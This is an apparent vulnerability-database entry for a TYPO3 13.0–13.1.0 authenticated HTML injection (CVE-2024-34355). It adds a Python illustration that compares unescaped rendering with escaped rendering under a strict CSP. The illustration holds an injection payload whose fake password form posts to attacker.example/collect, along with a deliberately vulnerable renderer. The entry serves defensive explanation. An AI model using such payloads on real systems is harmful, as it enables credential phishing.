CVE-2024-34355
Severity
LOW
TYPO3 13.0.0-13.1.0 - Authenticated HTML Injection in History Backend Module
TYPO3 is an enterprise content management system. Starting in version 13.0.0 and prior to version 13.1.1, the history backend module is vulnerable to HTML injection. Although Content-Security-Policy headers effectively prevent JavaScript execution, adversaries can still inject malicious HTML markup. Exploiting this vulnerability requires a valid backend user account. TYPO3 version 13.1.1 fixes the problem described.
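The description makes a point that is easy to misread: a strict Content-Security-Policy stops the injected markup from running script, but it does not stop the markup from rendering, so an attacker with a backend account can still plant a fake login form, links or other deceptive UI in a page other backend users trust. The following Python block is an added illustration, not TYPO3's code and not the patched code from the commit above. The function names, the row template and the payload are constructed for the example, and the CSP model is deliberately narrow (only a strict script-src is simulated; directives such as form-action or img-src are not). It shows the vulnerable rendering (CWE-116, record data concatenated into markup) beside the hardened form (contextual HTML escaping), and which injected elements a script-blocking CSP leaves alive.

```python
import html
from html.parser import HTMLParser

# Tags the (hypothetical) history-row template emits itself. Anything else
# in the rendered output can only have arrived through record data.
TEMPLATE_TAGS = {"tr", "td"}

# Constructed payload: a record title as a low-privileged backend user could
# save it. The first two parts need script execution; the <form> does not.
MALICIOUS_TITLE = (
    '<script>alert(1)</script>'
    '<img src="x" onerror="alert(1)">'
    '<form action="https://attacker.example/collect" method="post">'
    '<input name="password" type="password">'
    '<input type="submit" value="Session expired, re-enter password">'
    '</form>'
)


def render_history_row_vulnerable(title: str, user: str) -> str:
    """Hypothetical vulnerable rendering: record fields concatenated straight
    into markup with no output encoding (CWE-116)."""
    return f"<tr><td>{title}</td><td>{user}</td></tr>"


def render_history_row_fixed(title: str, user: str) -> str:
    """Hardened form: HTML-escape every field before it enters HTML text
    content, so <, >, &, " and ' become character references."""
    return (
        f"<tr><td>{html.escape(title, quote=True)}</td>"
        f"<td>{html.escape(user, quote=True)}</td></tr>"
    )


class _TagCollector(HTMLParser):
    """Records every start tag the browser's parser would see."""

    def __init__(self) -> None:
        super().__init__()
        self.elements: list[tuple[str, dict]] = []

    def handle_starttag(self, tag: str, attrs: list) -> None:
        self.elements.append((tag, dict(attrs)))


def injected_elements(rendered: str) -> list[tuple[str, dict]]:
    """Elements in the output that the template did not put there."""
    parser = _TagCollector()
    parser.feed(rendered)
    parser.close()
    return [(tag, attrs) for tag, attrs in parser.elements if tag not in TEMPLATE_TAGS]


def _script_bearing(name: str, value) -> bool:
    # Event-handler attributes and javascript: URLs are script, which a strict
    # script-src (nonce/hash, no 'unsafe-inline') refuses to run.
    return name.startswith("on") or (value or "").strip().lower().startswith("javascript:")


def markup_surviving_csp(rendered: str) -> list[tuple[str, dict]]:
    """Simplified model of a strict script-src CSP: <script> elements and
    script-bearing attributes are dropped, every other element still renders
    with its remaining attributes. (form-action, img-src etc. are not modelled.)"""
    survivors = []
    for tag, attrs in injected_elements(rendered):
        if tag == "script":
            continue
        kept = {k: v for k, v in attrs.items() if not _script_bearing(k, v)}
        survivors.append((tag, kept))
    return survivors


if __name__ == "__main__":
    vuln = render_history_row_vulnerable(MALICIOUS_TITLE, "editor")
    fixed = render_history_row_fixed(MALICIOUS_TITLE, "editor")
    print("injected into vulnerable row:", [t for t, _ in injected_elements(vuln)])
    print("still rendered under strict CSP:", markup_surviving_csp(vuln))
    print("injected into fixed row:", injected_elements(fixed))
```

Running the block shows the script element and the onerror handler disappearing under the simulated CSP while the img, form and input elements remain, which is exactly the residual risk the advisory describes (phishing-style UI and content injection rather than script execution). The fixed renderer leaves no injected elements at all because escaping happens at the point where data enters the HTML text context; that, not the CSP, is the actual fix, and the CVSS vector (UI:R, I:L) reflects the remaining markup-only impact.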
References (3)
Core References
Vendor Advisory x_refsource_confirm
https://github.com/TYPO3/typo3/security/advisories/GHSA-xjwx-78x7-q6jc
Patch x_refsource_misc
https://github.com/TYPO3/typo3/commit/56afa304ba8b5ad302e15df5def71bcc8d820375
Vendor Advisory x_refsource_misc
https://typo3.org/security/advisory/typo3-core-sa-2024-007
Scores
CVSS v3
3.5
EPSS
0.0059
EPSS Percentile
43.2%
Attack Vector
NETWORK
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
CISA SSVC
Vulnrichment
Exploitation
none
Automatable
no
Technical Impact
partial
Details
CWE
CWE-79
CWE-116
Status
published
Products (2)
typo3/cms-core
13.0.0 - 13.1.0 (fixed in 13.1.1)
Packagist
typo3/typo3
13.0.0 - 13.1.0 (fixed in 13.1.1)
Published
May 14, 2024
Tracked Since
Feb 18, 2026